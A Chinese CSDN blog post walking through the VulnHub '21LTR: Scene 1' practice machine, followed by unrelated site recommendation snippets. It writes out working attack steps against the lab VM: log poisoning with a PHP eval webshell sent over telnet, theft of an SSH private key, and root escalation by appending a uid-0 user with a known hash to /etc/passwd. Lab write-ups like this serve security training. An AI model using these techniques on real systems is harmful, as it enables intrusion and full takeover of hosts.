21LTR:Scene1靶机详情

于 2024-09-14 11:39:50 发布
阅读量125 收藏 6
点赞数 2
文章标签: linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoyanglailo/article/details/142254498
版权

靶机下载链接:https://www.vulnhub.com/entry/21ltr-scene-1,3/

一、靶机搭建

将靶机调到仅主机模式

我这边是自己做了一张仅主机的网卡

靶机的IP显示

二,端口扫描

给kali也添加一个仅主机的网卡 

namp 192.168.2.120


发现开启21、22、80、10001端口

三、访问80端口

![](https://img-blog.csdnimg.cn/img_convert/ccda102e280175835cdd30c382cb4d97.png)

我们扫描一下目录

找不到什么有用的信息

我们F12看一下网络源码

发现一个用户和密码

logs             #账号
zg]E-b0]+8:(58G  #密码

然后根据上面扫描到的端口,尝试进行连接

发现ftp连接成功

查看一下当前文件

发现有个文件,下载下来看看

get backup_log.php /home/kali/Desktop/1.php


cat 1.php

发现是日志文件

我们想起来刚刚目录探测有一个logs目录,我们尝试访问

http://192.168.2.120/logs/backup_log.php

get shell

因为这是日志文件,我们尝试一句话木马写入

我们这里尝试利用10001端口写入

telnet 192.168.2.120 10001
<?php eval($_POST[qxq]);?>

这边 10001有点不好连,一直尝试连接就好,总能连上的,相信自己

再次查看日志文件

发现有我们的东西,然后开始蚁剑连接

连接成功,进去查看/etc/passwd敏感信息

考虑到有ssh服务,我们可以使用密钥免密登录

读取密钥 /media/USB_1/Stuff/Keys/id_rsa

保存到本机上

这个时候,把这个id_rsa拖到kali里面

赋予id_rsa读写权限

chmod 600 id_rsa

然后ssh登入

ssh -i id_rsa hbeale@192.168.2.120

发现报错,我们修改config文件

cd ~/.ssh
vim config

添加

Host *
    HostKeyAlgorithms +ssh-rsa

这个时候

弹出了这个问题

进行解决

cd ~/.ssh
echo "PubkeyAcceptedKeyTypes +ssh-rsa" >> config

再次尝试连接

连接成功

创建用户密码openssl命令生成密码

openssl passwd 123456

创建用户,创建完成后Ctrl+c退出

sudo /usr/bin/cat >> /etc/passwd
aroot:$1$J1DRKiec$c6CXi9UUFTMKwHS6lk3bI1:0:0:/root:/bin/bash

切换用户,查看是否提权成功

su aroot
密码:123456
id
whoami

提权成功

秋喜秋
关注
panel-navigation-rtl-ltr:带有RTL支持的精美面板导航
05-11
标题 "panel-navigation-rtl-ltr:带有RTL支持的精美面板导航" 暗示了这是一个设计用于后台管理界面(admin dashboard)的导航组件,它具备右到左(RTL)和左到右(LTR)的语言布局支持。这在处理多语言网站或者需要...
LQG-LTR:精馏塔多变量控制中的LqG/LTR方法-matlab开发
05-30
1. 精馏塔过程的数学模型,通常用状态空间形式表示。 2. Kalman滤波器的实现,用于估计系统的不确定状态。 3. LQG控制器的设计,包括权重矩阵的选择,以优化特定的性能指标。 4. 李雅普诺夫函数的构造和分析,确保...
ltr-tools:一套用于学习排名的命令行工具
05-19
该项目同时包含ltr-tools cli和solr配置,以提供后端搜索功能。 该项目的主要范围将是提供有用的工具,以帮助“学习排名”集成和开发。 ltr-tools是一个命令行界面,用于运行一组实用程序任务,以可视化,调试和...
ltr-rtl:LTR 和 RTL 实现演示以及测试
06-01
1. 解压"ltr-rtl-master"文件。 2. 查看HTML文件,了解其布局结构和`dir`属性的使用。 3. 阅读JavaScript代码,理解如何检测浏览器的语言环境,以及如何根据需要切换布局方向。 4. 分析CSS文件,查看如何编写适应...
LtR-Feature-Extractor:学习排名特征提取任务
04-28
《LtR特征提取器:深度探索学习排名与信息检索》 在信息检索(IR)领域,学习排名(Learning-to-Rank, LTR)是一种至关重要的技术,它通过机器学习方法来优化文档排序,以提高搜索结果的相关性。LtR特征提取器就是...
Linux 进程控制
2302_77289177的博客
09-08 1282
Linux 进程控制
Linux】:信号与信号产生
Yikefore的博客
09-12 785
信号的基本概念、对信号的理解、信号的多种产生方式以及核心转储的详细介绍!
高效诊断Linux性能问题
Tiger93的博客
09-08 554
诊断Linux性能问题
.Net 执行Linux下多行shell命令方法
xk_hypothesis的博客
09-10 401
2.使用 3.解释 规范化换行符:使用 NormalizeNewlines 方法将所有换行符替换为 LF(\n)。 这样可以确保在 Linux 系统上执行时不会出现问题。 执行 Shell 命令:使用 ProcessStartInfo 配置进程启动信息。 设置 FileName 为 /bin/bash。 设置 Arguments 为执行命令所需的参数,使用 -c 参数来执行命令。 设置 UseShellExecute 为 false,以便更好地控制进程。 设置 RedirectStandardOutput
Linux之MySQL主从复制
2302_79087378的博客
09-08 1489
MySQL的主从复制()是一种数据复制解决方案,将主数据库的DDL(数据定义语言)和DML(数据操纵语言)操作通过二进制日志传到从库服务器中,然后在从库上对这些日志重新执行(也叫重做),从而是的从库和主库的数据保存同步。MySQL支持将数据从一个MySQL服务器(主服务器)复制到一个或多个其他MySQL服务器(从服务器),从库同时也可以作为其他从服务器的主库,实现链状复制。MySQL主从复制的优点主要包含以下三个方面:主库出现问题,可以快速切换到从库提供服务;实现读写分离,降低主库的访问压力;
Linux 下 C/C++ 程序编译的过程
Teminator_的博客
09-08 9362
本文将介绍如何将 C/C++ 语言编写的程序转换成为处理器能够执行的二进制代码的过程,包括四个步骤:预处理()编译()汇编()链接(在此之前,首先来看一下 GCC 工具链。
LinuxLinux 可重入函数
2403_86785171的博客
09-08 1036
简单来说,可重入函数是线程安全的函数。当函数正在执行时,如果它被其他线程或中断再次调用,它能够正确处理这种情况。不使用静态或全局变量,或仅使用局部变量。不依赖非线程安全的库函数,如malloc或strtok。不修改输入参数。如果函数需要访问共享资源,则必须使用同步机制(如锁或信号量)来避免竞态条件。
直播相关01-录制麦克风声音,QT上 .pro 将 linux,mac和windows上配置为三种可以共享, 在.pro文件中 message 的作用
hunandede的博客
09-09 654
一 QT 上的 .pro 文件将 linux,mac和windows上配置设置为可以共享 1. 先来看文件夹布局 2. 再来看 QT 中的 .pro文件
LINUX】在ubuntu中安装tomcat
09-11 231
#instal jdk apt install openjdk-8-jdk -y#enter install path cd /home/a/#copy tomcat package cp /mnt/hgfs/Share/apache-tomcat-9.0.93.tar.gz .#unpress tomcat package tar -xf apache-tomcat-9.0.93.tar.gz #enter bin path cd apache-tomcat-9.0.93/bin#start the se
Linux xargs命令
菜鸟记录
09-08 1129
Linux xargs命令
linux 中删除乱码中文名文件
她的吻让他
09-13 120
在操作linux时会不经意将带有中文的文件发送到linux系统,但是有些linux系统不能识别中文以及中文符号等,会导致linux shell命令无法操作这些文件。想要删除无法识别名字的文件,需要找到其inode 号,通过inode 删除文件。find . -inum inode号 -exec rm {} \;整体操作分为两条指令。
linux实用操作
最新发布
lonelyxxyo的博客
09-13 1316
环境变量PATH这个项目里面记录了系统执行命令的搜索路径。这些搜索路径我们也可以自行添加到PATH中去。黑马教学案例:测试:在当前HOME目录内创建文件夹,myenv,在文件夹内创建文件mkhaha通过vim编辑器,在mkhaha文件内填入:echo 哈哈哈哈哈完成上述操作后,随意切换工作目录,执行mkhaha命令尝试一下,会发现无法执行修改PATH的值。
Linux-------基础
weixin_69190490的博客
09-09 412
2、安装 Ubuntu Linux 会自带 unity桌面环境,操作方便。shutdown 9:00 在 9 点关机 【1-24小时制】1、拥有完整图形化界面,是面向普通用户对象,比较容易上手。sudo -i 切换到 root (超级管理员)shutdown 【+】分钟 在多少分钟之后关机。shutdown -h now 立即关机。halt 关机 (需要 root 权限)开放性、安全性、多用户性、网络性。shutdown 一分钟之后关机。su 用户名 切换到对应的用户。exit 注销/推出。
C++ linux下的cmake
JackerCSDN的博客
09-08 456
cmake简单使用
ProtDec-LTR:学习排序提升蛋白质远程同源性检测
论文作者Bin Liu、Junjie Chen和Xiaolong Wang提出了一种名为ProtDec-LTR(Protein Decoder with Learning to Rank)的新方法。这种方法结合了学习排名的策略,目的是通过优化现有技术的组合来提高预测的准确性。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值